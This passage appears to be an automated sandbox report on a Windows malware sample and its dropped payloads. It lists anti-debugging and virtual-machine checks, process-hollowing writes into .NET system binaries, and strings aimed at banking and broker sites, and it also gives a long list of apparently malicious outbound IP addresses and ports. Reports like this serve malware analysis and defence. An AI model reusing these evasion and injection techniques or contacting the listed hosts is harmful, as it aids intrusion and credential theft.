                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: newstart.exe, 00000019.00000002.3947980526.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: newstart.exe, 00000019.00000002.3935728996.000000000145F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4459079452.00000000016D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                                Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: newstart.exe, 00000019.00000002.3947980526.00000000042B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeFile opened: SIWVID
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess queried: DebugPort
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess queried: DebugPort
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess queried: DebugPort
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeCode function: 0_2_05030CF0 rdtsc 0_2_05030CF0
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB2CC3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00AB2CC3
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009F643B mov eax, dword ptr fs:[00000030h]2_2_009F643B
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009FA1A2 mov eax, dword ptr fs:[00000030h]2_2_009FA1A2
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB9BB2 mov eax, dword ptr fs:[00000030h]4_2_00AB9BB2
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB6A6E mov ecx, dword ptr fs:[00000030h]4_2_00AB6A6E
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB9BF6 mov eax, dword ptr fs:[00000030h]4_2_00AB9BF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041914C mov eax, dword ptr fs:[00000030h]5_2_0041914C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004114A6 mov ecx, dword ptr fs:[00000030h]5_2_004114A6
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C3B9CE0 mov eax, dword ptr fs:[00000030h]18_2_6C3B9CE0
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AC2EE6 GetProcessHeap,4_2_00AC2EE6
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AAB896 SetUnhandledExceptionFilter,4_2_00AAB896
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AAB9A5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00AAB9A5
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AB2CC3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00AB2CC3
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00AAB73A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00AAB73A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00407B01
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00407C63 SetUnhandledExceptionFilter,5_2_00407C63
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00407D75
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0040DD78
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C38FD01 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6C38FD01
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C393DB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_6C393DB6
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C3901DA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_6C3901DA
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 171.217.69.113 10800
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 170.106.76.24 21707
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 166.0.235.52 35104
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 137.53.152.220 8080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.128.133.141 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 184.178.172.5 15303
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 107.152.98.5 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 46.8.60.2 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.10.160.172 10425
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 199.102.104.70 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 104.31.138.26 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.121.183.107 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 177.126.86.78 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 113.161.210.60 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.121.182.88 8081
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 67.227.158.154 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 177.39.193.109 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 218.201.21.154 83
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 75.119.145.154 37347
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.213.156.191 9080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 135.148.10.161 19212
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 198.157.68.47 1337
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 197.98.201.15 10909
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 115.178.181.15 8081
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 67.43.236.20 12797
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.152.112.234 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 190.109.72.25 33633
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 43.129.195.235 8118
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 104.36.166.42 15832
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.32.47.105 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.37.216.68 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 182.253.246.213 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 188.209.246.243 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 149.62.193.91 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 184.181.217.201 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 172.135.136.144 8081
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 194.44.74.118 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.10.164.178 2679
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.79.189.110 35723
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 162.241.45.22 42021
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.182.52.159 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 20.247.104.85 39918
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 38.57.3.54 46235
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.141.189.62 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 81.12.169.254 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.64.199.82 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 192.111.139.163 19404
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 192.111.138.29 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 27.123.3.141 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 57.139.102.111 22
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.111.22.65 58563
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 176.112.96.2 3629
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 129.126.65.78 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 31.200.242.201 12196
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 92.241.66.138 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.205.128.7 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.47.93.236 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 222.165.223.138 41541
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.116.210.163 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 201.71.2.177 999
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 162.214.75.237 24949
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 67.43.228.251 1961
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.78.16.76 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.130.36.245 8888
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 141.105.107.152 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 36.82.203.68 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 38.57.3.39 28506
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 197.251.236.226 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 107.180.101.226 37552
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 148.72.210.123 7749
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 195.2.78.251 1987
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 114.108.177.104 60984
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 24.249.199.4 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 193.200.151.158 8192
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 177.72.82.9 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 212.19.171.48 8080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 117.74.65.207 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 104.18.11.5 443
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 97.74.229.3 45644
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 173.212.237.43 9170
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 195.2.76.207 11531
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 198.12.253.239 39820
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.195.34.58 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 178.62.7.98 33475
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.121.214.50 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 66.29.128.244 41496
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 148.72.212.125 21307
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.210.29.201 31433
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.135.7.2 63123
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 199.58.184.97 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.64.199.79 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 207.55.240.19 59714
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 78.146.180.112 110
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 76.26.114.253 39593
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 213.160.71.130 10664
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 148.72.212.252 64753
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 186.248.197.210 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.251.57.49 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 166.62.88.163 14827
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 142.54.235.9 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 223.19.139.172 80
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 192.252.214.20 15864
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 183.88.157.154 8080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 128.199.183.41 39047
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 109.238.12.156 50539
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.124.137.251 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 166.0.235.5 53215
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 49.229.36.170 4153
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 184.178.172.11 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.79.152.204 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 45.234.100.102 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.130.39.117 9999
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.130.113.245 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 50.63.12.33 57800
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 72.195.34.42 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 47.90.167.27 3128
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 8.213.128.90 8060
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.122.204.56 41543
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 200.85.169.221 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.77.111.198 49547
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 174.77.111.196 4145
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 103.54.148.189 1080
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 185.18.198.163 38188
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 83.234.147.166 6363
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 201.204.47.66 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 58.57.2.46 10800
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 190.14.155.198 5678
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeNetwork Connect: 110.139.128.232 4145
                                Source: Yara matchFile source: Process Memory Space: hello.exe PID: 7396, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7464, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and write
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_005E018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,4_2_005E018D
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4E2000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6F7008Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 41C000
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 424000
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 637000
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2D28008
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C63008
